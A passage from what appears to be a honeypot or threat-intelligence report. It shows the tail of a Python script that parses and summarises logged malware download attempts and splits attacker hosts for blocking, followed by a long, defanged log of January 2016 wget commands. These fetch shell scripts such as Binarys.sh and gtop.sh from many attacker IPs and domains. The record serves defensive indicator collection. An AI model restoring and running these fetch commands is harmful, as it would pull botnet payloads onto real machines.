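    cmd = re.sub(r"\.sh(?=-O\b)", ".sh ", cmd)  # "gb.sh-O"     -> "gb.sh -O"
    cmd = re.sub(r"://\s+", "://", cmd)         # "hxxp:// host" -> "hxxp://host"
    return cmd.replace('"', "")                 # quoted host names


def parse_log(text):
    """Return one record per log entry, with every download it attempted."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append([m.group(1), m.group(2)])
        elif line.strip() and entries and line[0].isspace():
            # Indented line: alternative downloader chained to the same entry.
            entries[-1][1] += " " + line.strip()
    attempts = []
    for ts, raw in entries:
        fetches = []
        for part in normalise(raw).split(";"):
            tokens, url = part.split(), URL_RE.search(part)
            if tokens and url:
                fetches.append({"tool": tokens[0],
                                "scheme": SCHEMES[url.group(1).lower()],
                                "host": url.group(2).lower(),
                                "path": url.group(3) or "/"})
        if fetches:
            attempts.append({"time": ts, "fetches": fetches})
    return attempts


def summarise(attempts):
    """Attempt total, first-choice vs. fallback tools, attempts per host."""
    hosts = Counter()
    for a in attempts:
        hosts.update({f["host"] for f in a["fetches"]})  # once per entry
    return {
        "total": len(attempts),
        "primary": Counter(a["fetches"][0]["tool"] for a in attempts),
        "fallback": Counter(f["tool"] for a in attempts for f in a["fetches"][1:]),
        "hosts": hosts,
    }


def split_indicators(hosts):
    """Separate IP literals (firewall rules) from names (DNS blocking)."""
    ips, names = [], []
    for h in sorted(hosts):
        try:
            ipaddress.ip_address(h)
            ips.append(h)
        except ValueError:
            names.append(h)
    return ips, names


if __name__ == "__main__":
    summary = summarise(parse_log(SAMPLE_LOG))
    print(summary["total"], dict(summary["primary"]), dict(summary["fallback"]))
    print(split_indicators(summary["hosts"]))
```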

2. Interactive Map:

Powered by my friend's (JC SoCal's cool GIPC)

3. CSV GeoIP Database:


4. CSV Network Routing Database


5. Log of infection attempts time stamp (as cyber incident evidence):

2016-01-20 02:27:34 | wget hxxp:// binarys.x10.mx/qbot/Binarys . sh
2016-01-20 02:19:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 01:42:34 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 01:27:42 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 01:14:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-20 00:35:57 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-20 00:24:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 23:58:11 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-19 23:19:08 | wget 192.227.170.67/bins . sh
2016-01-19 22:04:11 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 22:01:31 | wget hxxp:// 208.73.207.236/gtop . sh
2016-01-19 21:44:34 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 21:21:10 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 21:04:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 20:13:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 16:09:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 15:21:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 15:12:13 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-19 15:12:13 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-19 14:56:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 14:11:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-19 08:30:58 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 07:58:19 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 04:32:58 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:52:38 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:37:52 | wget hxxp:// 185.62.190.62/dox . sh
2016-01-19 03:09:10 | wget hxxp:// 158.69.217.211/gb . sh
2016-01-19 02:03:04 | wget hxxp:// 158.69.217.211/gb . sh
2016-01-18 22:37:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 22:31:33 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 21:48:44 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 19:16:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 19:09:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:33:30 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:26:36 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 18:25:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 18:08:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 17:47:42 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 17:35:26 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-18 16:14:46 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 15:50:46 | wget hxxp:// www.hongcherng.com/rd/rd . sh-O /tmp/ich . sh
2016-01-18 15:08:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 14:59:57 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 14:24:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-18 05:23:27 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 04:21:59 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 03:31:26 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-18 02:47:49 | wget hxxp:// binarys.x10.mx/king/Binarys . sh
2016-01-18 02:31:48 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 02:23:52 | wget hxxp:// binarys.x10.mx/king/Binarys . sh
2016-01-18 02:21:28 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-18 02:15:19 | wget ftx://79.143.181.158/gtop . sh
2016-01-18 01:32:08 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-18 01:31:53 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-18 01:07:15 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 23:48:52 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 22:39:13 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-17 22:30:53 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-17 21:35:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 21:21:12 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 21:08:24 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 20:18:45 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 19:45:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 18:54:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 18:13:59 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 17:57:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 17:03:06 | wget hxxp:// 94.102.49.197/gb-wget . sh
2016-01-17 09:51:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-17 09:15:53 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 08:37:10 | wget ftx://79.143.181.158/gtop . sh
2016-01-17 06:42:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 05:59:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-17 01:47:52 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-17 00:39:05 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-16 23:41:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 23:13:19 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 23:09:42 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 22:54:36 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 22:49:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 22:23:13 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 22:15:45 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-16 20:16:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 20:09:38 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 18:43:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 18:33:39 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 18:07:11 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-16 17:46:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 17:37:08 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-16 08:12:22 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-16 02:50:01 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 23:06:34 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 22:37:03 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 22:32:13 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 22:20:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 21:02:27 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-15 19:44:51 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-15 19:14:54 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-15 18:26:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 17:31:26 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 17:17:24 | wget hxxp:// www.hongcherng.com/rd/rd . sh-O /tmp/ich . sh
2016-01-15 16:43:10 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 15:26:25 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-15 14:13:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 14:03:12 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 12:40:26 | wget -q hxxp:// 162.208.8.203/p . sh
2016-01-15 07:31:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 07:21:29 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-15 07:14:50 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 06:44:14 | wget hxxp:// 216.158.225.7/gtop . sh
2016-01-15 02:38:27 | wget ftx://79.143.181.158/gtop . sh
2016-01-15 02:36:06 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 02:22:57 | wget -q hxxp:// 198.12.97.67/Bot/stun . sh
2016-01-15 00:27:16 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-15 00:12:57 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:45:16 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 22:03:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 21:53:15 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 21:39:11 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 20:55:24 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 20:26:48 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 17:59:24 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-14 17:45:01 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 17:03:32 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 15:24:42 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 15:14:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 15:01:20 | wget ftx://79.143.181.158/gtop . sh
2016-01-14 14:45:57 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 14:15:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 14:05:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-14 13:54:38 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 13:43:29 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 10:37:24 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-14 10:37:22 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-14 08:54:03 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-14 00:52:25 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-14 00:05:18 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-13 22:22:16 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 22:12:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 21:44:02 | wget ftx://79.143.181.158/gtop . sh
2016-01-13 21:19:52 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 21:16:50 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-13 19:46:09 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 16:48:47 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 16:38:50 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 15:05:41 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-13 14:31:12 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 14:16:54 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 14:10:12 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 14:09:33 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 13:23:35 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 13:23:33 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 13:18:01 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-13 12:40:02 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 12:39:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-13 10:35:24 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 08:02:52 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 07:21:22 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-13 07:03:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-13 06:05:58 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 02:46:30 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-13 02:26:53 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 02:11:42 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-13 01:20:37 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-13 01:17:04 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-13 00:35:44 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-13 00:27:29 | wget www.hongcherng.com/bc/bc . sh-O /tmp/ich . sh
2016-01-12 23:46:54 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-12 21:44:13 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-12 20:25:49 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-12 16:53:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 16:43:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 11:30:47 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 11:22:14 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-12 08:50:05 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 07:53:17 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 05:53:28 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-12 04:49:52 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 04:40:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-12 04:31:34 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 03:29:42 | wget hxxp:// 89.248.166.131/bin . sh
2016-01-12 02:14:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-12 02:14:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-12 01:45:01 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-11 23:11:53 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 23:02:44 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:36:13 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-11 22:32:27 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 22:32:27 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 21:48:15 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:25:01 | wget hxxp:// 173.242.119.122/lol . sh
2016-01-11 21:21:29 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-11 19:17:44 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-11 18:46:32 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 17:40:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 14:26:05 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-11 14:11:40 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 14:11:40 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:59:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 13:54:43 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:54:42 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:49:10 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 13:44:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 13:44:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 12:25:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 12:15:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 08:38:34 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:28:25 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 08:22:59 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-11 08:22:57 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-11 08:11:02 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 07:32:20 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 06:43:22 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:57:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:49:38 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:42:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:42:41 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:34:05 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-11 00:28:19 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:28:19 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-11 00:13:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-11 00:04:14 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 23:18:31 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-10 23:16:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 23:06:26 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 19:55:46 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:51:09 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:46:55 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 19:23:48 | wget -q hxxp:// 198.23.238.251/gb . sh
2016-01-10 19:23:10 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 19:23:10 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 19:16:57 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 19:07:02 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:48:58 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 18:47:19 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 17:35:23 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 17:31:07 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:24:01 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:09:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 17:09:50 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-10 16:42:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 16:32:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 15:07:41 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 12:18:23 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 07:36:02 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 05:19:50 | wget hxxp:// 208.67.1.142/qbot/Binarys . sh
2016-01-10 05:18:36 | wget -q hxxp:// 208.67.1.165/DOGDICKS/Binarys . sh
2016-01-10 04:43:01 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 03:24:31 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 03:14:55 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 02:43:30 | wget hxxp:// 218.104.49.211/r3//rd . sh-O /tmp/.lm . sh
2016-01-10 02:34:43 | wget wget hxxp:// 218.104.49.211/r3//rd . sh-O /tmp/.lm . sh
2016-01-10 02:15:50 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-10 02:13:48 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 02:04:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:48:43 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:39:04 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:16:59 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 01:07:17 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:42:47 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:40:21 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:31:26 | wget hxxp:// 192.227.170.67/bins . sh
2016-01-10 00:30:35 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:15:46 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:05:51 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-10 00:05:40 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-10 00:02:25 | wget hxxp:// 94.102.63.136/bin . sh
2016-01-09 23:56:11 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 23:20:55 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 22:43:46 | wget hxxp:// 218.104.49.211/r3/rd . sh-O /tmp/ vira . sh
2016-01-09 22:26:27 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 22:03:05 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 21:18:34 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:59:54 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:58:33 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:57:46 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:48:49 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:48:28 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:40:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:40:57 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:24:46 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:24:36 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:24:36 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 20:11:20 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 20:08:49 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 20:07:05 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 20:01:36 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 17:16:47 | wget ftx://51.254.238.19/gb . sh
2016-01-09 14:22:09 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 14:12:07 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 13:25:54 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 13:15:46 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 09:53:33 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 09:42:53 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-09 09:42:51 | wget -q hxxp:// 199.180.133.214/Sharky/gb . sh
2016-01-09 09:35:50 | wget hxxp:// 158.69.205.212/getbinaries . sh
2016-01-09 08:27:57 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 07:56:56 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 07:48:27 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 06:20:33 | wget hxxp:// 192.227.177.127/gtop . sh
2016-01-09 05:49:03 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 05:39:18 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
2016-01-09 05:14:00 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 05:02:32 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:52:29 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:43:25 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 04:40:06 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:30:04 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 04:07:08 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 04:05:31 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:44:26 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:40:26 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:27:09 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 03:27:09 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:15:18 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 03:05:34 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 02:57:44 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 02:57:14 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 02:55:39 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 02:44:07 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 01:54:55 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:45:07 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 01:23:34 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:13:37 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 01:03:32 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 01:02:08 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:55:33 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:55:33 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:51:33 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:41:31 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:41:29 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:41:29 | wget hxxp:// 185.130.5.246/bin3 . sh
2016-01-09 00:27:11 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-09 00:26:46 | wget hxxp:// 31.14.136.142/bins . sh
2016-01-09 00:18:20 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:08:27 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-09 00:03:17 | wget hxxp:// 23.89.158.69/gtop . sh
2016-01-08 21:51:53 | wget hxxp:// 185.62.189.11/DOGDICKS/Binarys . sh
2016-01-08 21:43:27 | wget hxxp:// 208.67.1.3/DOGDICKS/Binarys . sh
